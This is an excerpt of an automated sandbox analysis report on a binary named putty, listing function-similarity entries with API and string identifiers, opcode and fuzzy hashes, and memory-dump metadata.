                      Strings
                      Similarity
                      • API ID: CommErrorLast$StateTimeouts
                      • String ID: Configuring %s flow control
                      • API String ID: 274883806-3277764455
                      • Opcode ID: 719437e26983418da532ba82bb22c9a866490e0860abca4019a22f30a6799b5c
                      • Instruction ID: 3919fe197c6d0966ce383f44334226c2c21c2d0b99768f7b0babb6194a877dd4
                      • Opcode Fuzzy Hash: 719437e26983418da532ba82bb22c9a866490e0860abca4019a22f30a6799b5c
                      • Instruction Fuzzy Hash: 11F0A923E2C602A1F9219B31D44417B5B50AF85B84FB09531DD4DD6648DE7CEE81AB4C
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Event_set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c$h->type == HT_INPUT
                      • API String ID: 1844187620-945550184
                      • Opcode ID: 34eab87568b2f97d5e78bd25981b66ade2e13560c7c1c26ef2be028d2d195b8c
                      • Instruction ID: 0852688aa2facb521d6b1b09d2ca91042d99ed541c72e6b6b7229622defc83aa
                      • Opcode Fuzzy Hash: 34eab87568b2f97d5e78bd25981b66ade2e13560c7c1c26ef2be028d2d195b8c
                      • Instruction Fuzzy Hash: 32F0C813F2914161FF359735E81877E2F605F887A4F644171CA0E826E4AE6CEEC0E308
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: SetDefaultDllDirectories$kernel32.dll
                      • API String ID: 190572456-2102062458
                      • Opcode ID: 3977d5c47726d2f85b452bdcaa505178c3a3fa69f2171c5116603cac5906ebac
                      • Instruction ID: 18d35d69c3a04ce7c8b15bdcb02a86a172406a2e8d88a98de27bd194d7237a50
                      • Opcode Fuzzy Hash: 3977d5c47726d2f85b452bdcaa505178c3a3fa69f2171c5116603cac5906ebac
                      • Instruction Fuzzy Hash: D3F0DA1AE2EB03A1FE998725AC563322E915F68300F740935C40DC57A5EE6CED55A718